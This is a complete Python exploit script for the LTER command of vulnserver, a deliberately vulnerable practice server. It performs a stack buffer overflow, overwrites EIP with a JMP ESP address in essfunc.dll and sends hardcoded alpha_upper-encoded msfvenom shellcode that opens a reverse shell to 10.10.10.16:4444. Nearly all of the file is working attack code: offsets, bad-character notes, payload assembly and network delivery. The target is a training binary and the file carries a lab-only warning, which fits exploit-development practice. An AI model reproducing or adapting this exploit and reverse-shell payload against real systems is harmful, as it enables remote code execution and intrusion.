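#!/usr/bin/env python3
"""Vulnserver LTER stack-overflow exploit (EIP overwrite -> JMP ESP -> shellcode).

Usage: <script> <host> <port>

Layout of the data sent after the "LTER /.:/" command, as worked out with
the author's SPIKE / msf-pattern_offset notes:

    2003 x "A"  - filler up to the saved return address
                  (msf-pattern_offset -q 386F4337 -> exact match at 2003)
    JMP ESP     - 0x62501203 in essfunc.dll, little-endian
    shellcode   - starts at the bytes ESP points to after the RET
                  (msf-pattern_offset -q 43396F43 -> exact match at 2007)
    "C" filler  - pads the data to the 3516 bytes the author sent

Bad characters reported by the author for this command: \x00, and the
input is "uppercase only", which is why the shellcode is x86/alpha_upper
encoded with BufferRegister=ESP.

Only run this against a lab instance of vulnserver you are authorised to test.
"""
import socket
import struct
import sys

# 0x62501203: JMP ESP in essfunc.dll, packed as a 32-bit little-endian
# saved return address.  None of its bytes is \x00.
JMP_ESP = struct.pack("<I", 0x62501203)

# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.16 LPORT=4444 --arch x86 --platform windows bufferregister=esp -e x86/alpha_upper -f c
# x86/alpha_upper chosen with final size 702
# NOTE: the listener address 10.10.10.16:4444 is baked into these bytes;
# regenerate the payload (keeping bufferregister=esp and alpha_upper) for a
# different LHOST/LPORT.
SHELLCODE = (
    b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
    b"\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
    b"\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
    b"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
    b"\x4c\x4b\x58\x4c\x42\x35\x50\x43\x30\x35\x50\x43\x50\x4d\x59"
    b"\x4a\x45\x36\x51\x4f\x30\x52\x44\x4c\x4b\x30\x50\x46\x50\x4c"
    b"\x4b\x50\x52\x44\x4c\x4c\x4b\x30\x52\x32\x34\x4c\x4b\x32\x52"
    b"\x46\x48\x34\x4f\x48\x37\x31\x5a\x46\x46\x50\x31\x4b\x4f\x4e"
    b"\x4c\x57\x4c\x55\x31\x53\x4c\x55\x52\x36\x4c\x37\x50\x4f\x31"
    b"\x48\x4f\x44\x4d\x55\x51\x48\x47\x4d\x32\x4c\x32\x30\x52\x36"
    b"\x37\x4c\x4b\x46\x32\x42\x30\x4c\x4b\x31\x5a\x57\x4c\x4c\x4b"
    b"\x30\x4c\x44\x51\x53\x48\x5a\x43\x57\x38\x53\x31\x38\x51\x56"
    b"\x31\x4c\x4b\x31\x49\x47\x50\x45\x51\x4e\x33\x4c\x4b\x50\x49"
    b"\x32\x38\x4a\x43\x36\x5a\x57\x39\x4c\x4b\x37\x44\x4c\x4b\x35"
    b"\x51\x4e\x36\x46\x51\x4b\x4f\x4e\x4c\x59\x51\x38\x4f\x44\x4d"
    b"\x53\x31\x39\x57\x56\x58\x4b\x50\x34\x35\x4c\x36\x35\x53\x43"
    b"\x4d\x5a\x58\x57\x4b\x33\x4d\x37\x54\x42\x55\x4b\x54\x50\x58"
    b"\x4c\x4b\x30\x58\x31\x34\x45\x51\x59\x43\x35\x36\x4c\x4b\x44"
    b"\x4c\x50\x4b\x4c\x4b\x30\x58\x45\x4c\x33\x31\x58\x53\x4c\x4b"
    b"\x55\x54\x4c\x4b\x43\x31\x58\x50\x4c\x49\x57\x34\x36\x44\x51"
    b"\x34\x31\x4b\x51\x4b\x35\x31\x31\x49\x51\x4a\x30\x51\x4b\x4f"
    b"\x4d\x30\x51\x4f\x31\x4f\x50\x5a\x4c\x4b\x45\x42\x4a\x4b\x4c"
    b"\x4d\x51\x4d\x45\x38\x47\x43\x37\x42\x35\x50\x45\x50\x53\x58"
    b"\x44\x37\x53\x43\x36\x52\x31\x4f\x36\x34\x45\x38\x50\x4c\x44"
    b"\x37\x36\x46\x53\x37\x4b\x4f\x38\x55\x58\x38\x4a\x30\x53\x31"
    b"\x35\x50\x35\x50\x36\x49\x4f\x34\x50\x54\x36\x30\x53\x58\x56"
    b"\x49\x4b\x30\x42\x4b\x45\x50\x4b\x4f\x48\x55\x56\x30\x56\x30"
    b"\x50\x50\x50\x50\x47\x30\x56\x30\x51\x50\x56\x30\x35\x38\x4b"
    b"\x5a\x54\x4f\x49\x4f\x4b\x50\x4b\x4f\x49\x45\x5a\x37\x53\x5a"
    b"\x33\x35\x33\x58\x54\x4a\x35\x5a\x54\x4a\x34\x50\x32\x48\x55"
    b"\x52\x33\x30\x44\x51\x31\x4c\x4c\x49\x4d\x36\x42\x4a\x54\x50"
    b"\x36\x36\x46\x37\x53\x58\x4c\x59\x4e\x45\x52\x54\x43\x51\x4b"
    b"\x4f\x48\x55\x4d\x55\x59\x50\x54\x34\x44\x4c\x4b\x4f\x50\x4e"
    b"\x44\x48\x43\x45\x4a\x4c\x35\x38\x4a\x50\x48\x35\x49\x32\x30"
    b"\x56\x4b\x4f\x59\x45\x55\x38\x52\x43\x42\x4d\x53\x54\x43\x30"
    b"\x4b\x39\x4b\x53\x36\x37\x36\x37\x50\x57\x46\x51\x5a\x56\x42"
    b"\x4a\x52\x32\x30\x59\x46\x36\x5a\x42\x4b\x4d\x33\x56\x39\x57"
    b"\x31\x54\x46\x44\x37\x4c\x35\x51\x55\x51\x4c\x4d\x57\x34\x31"
    b"\x34\x54\x50\x58\x46\x43\x30\x57\x34\x50\x54\x46\x30\x36\x36"
    b"\x56\x36\x36\x36\x37\x36\x50\x56\x30\x4e\x51\x46\x46\x36\x36"
    b"\x33\x31\x46\x53\x58\x42\x59\x48\x4c\x47\x4f\x4b\x36\x4b\x4f"
    b"\x38\x55\x4b\x39\x4d\x30\x50\x4e\x51\x46\x30\x46\x4b\x4f\x50"
    b"\x30\x53\x58\x34\x48\x4b\x37\x55\x4d\x43\x50\x4b\x4f\x4e\x35"
    b"\x4f\x4b\x4a\x50\x4f\x45\x4e\x42\x50\x56\x33\x58\x39\x36\x4d"
    b"\x45\x4f\x4d\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x54\x46\x33\x4c"
    b"\x35\x5a\x4b\x30\x4b\x4b\x4d\x30\x33\x45\x45\x55\x4f\x4b\x51"
    b"\x57\x55\x43\x43\x42\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f"
    b"\x49\x45\x41\x41"
)

# Overflowed with lter.spk "LTER /.:/(3520 A's)"
# Message= EIP contains normal pattern : 0x386f4337 (offset 2003)
# \x00 & Uppercase Only
COMMAND = b"LTER /.:/"
EIP_OFFSET = 2003   # bytes of filler before the saved return address
TOTAL_LEN = 3516    # total bytes sent after COMMAND, as in the author's run

# Seconds to wait for the connect / banner / send; the original script had no
# timeout and would hang forever on a silent target.
SOCKET_TIMEOUT = 10.0


def build_payload():
    """Return the complete LTER request as bytes.

    The shellcode is placed immediately after the overwritten return
    address, so once JMP ESP runs, ESP points at its first byte.  The
    alpha_upper decoder was generated with BufferRegister=ESP and depends
    on exactly that, so no NOP sled is put in front of it (the original
    author's unused "\x43\x4B" inc ebx/dec ebx sled was dropped for the
    same reason).

    Raises:
        ValueError: if the shellcode and return address no longer fit in
            TOTAL_LEN (e.g. after regenerating a larger payload).
    """
    filler_len = TOTAL_LEN - EIP_OFFSET - len(JMP_ESP) - len(SHELLCODE)
    if filler_len < 0:
        raise ValueError(
            "payload is %d bytes too long for TOTAL_LEN=%d" % (-filler_len, TOTAL_LEN)
        )
    return b"".join([
        COMMAND,
        b"A" * EIP_OFFSET,
        JMP_ESP,
        SHELLCODE,
        b"C" * filler_len,
    ])


def send_payload(host, port, timeout=SOCKET_TIMEOUT):
    """Connect to vulnserver, read its banner, and deliver the payload.

    Uses sendall() so the whole buffer is written even if the kernel
    accepts it in pieces, and a context manager so the socket is closed
    on any error.

    Raises:
        OSError: on connection, timeout or send failures (socket.timeout
            is a subclass of OSError).
    """
    payload = build_payload()
    print("[+] Connecting to target")
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.recv(1024)  # vulnserver greeting banner; discarded
        print("[+] Sent payload with length: %d" % len(payload))
        sock.sendall(payload)


def main(argv=None):
    """CLI entry point: ``<host> <port>``.  Returns a process exit status."""
    args = sys.argv[1:] if argv is None else list(argv)
    if len(args) != 2:
        print("usage: %s <host> <port>" % sys.argv[0], file=sys.stderr)
        return 2
    host = args[0]
    try:
        port = int(args[1])
    except ValueError:
        print("[-] port must be an integer, got %r" % args[1], file=sys.stderr)
        return 2
    try:
        send_payload(host, port)
    except OSError as exc:
        # Report the actual failure instead of silently swallowing it.
        print("[-] Something went wrong :( %s" % exc, file=sys.stderr)
        return 1
    return 0


if __name__ == "__main__":
    sys.exit(main())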